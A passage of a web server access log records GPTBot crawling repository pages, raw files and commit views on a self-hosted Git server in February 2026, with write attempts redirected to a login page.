14064] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" -[17/Feb/2026:15:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:15:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9831] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:26:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs" [Client 74.7.227.38] [Length 11408] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:15:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 11097] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:15:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 13005] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:15:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:15:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data" -[17/Feb/2026:15:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:15:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data" -[17/Feb/2026:15:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:15:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data" -[17/Feb/2026:15:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 5559] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:15:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 16999] [Gzip 9.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:15:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" -[17/Feb/2026:15:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 10891] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" -[17/Feb/2026:15:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs" [Client 74.7.227.38] [Length 10612] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:15:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 1426] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" -[17/Feb/2026:15:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" -[17/Feb/2026:15:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10058] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" -[17/Feb/2026:15:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:15:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:15:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 9821] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:15:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 12066] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:15:26:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:15:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs" -[17/Feb/2026:15:26:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/logs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:15:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/logs" -[17/Feb/2026:15:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:15:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:15:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" -[17/Feb/2026:15:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 2130] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:15:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 15915] [Gzip 10.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:15:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 2130] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:15:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 15881] [Gzip 10.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:15:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2findex.html" [Client 74.7.227.38] [Length 35178] [Gzip 7.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:15:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" -[17/Feb/2026:15:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" -[17/Feb/2026:15:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13128] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" -[17/Feb/2026:15:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" -[17/Feb/2026:15:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13160] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" -[17/Feb/2026:15:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" -[17/Feb/2026:15:26:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/index.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:15:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/find/branch/main" [Client 74.7.227.38] [Length 7470] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:15:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:15:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" -[17/Feb/2026:15:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12464] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12467] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 20852] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 20834] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 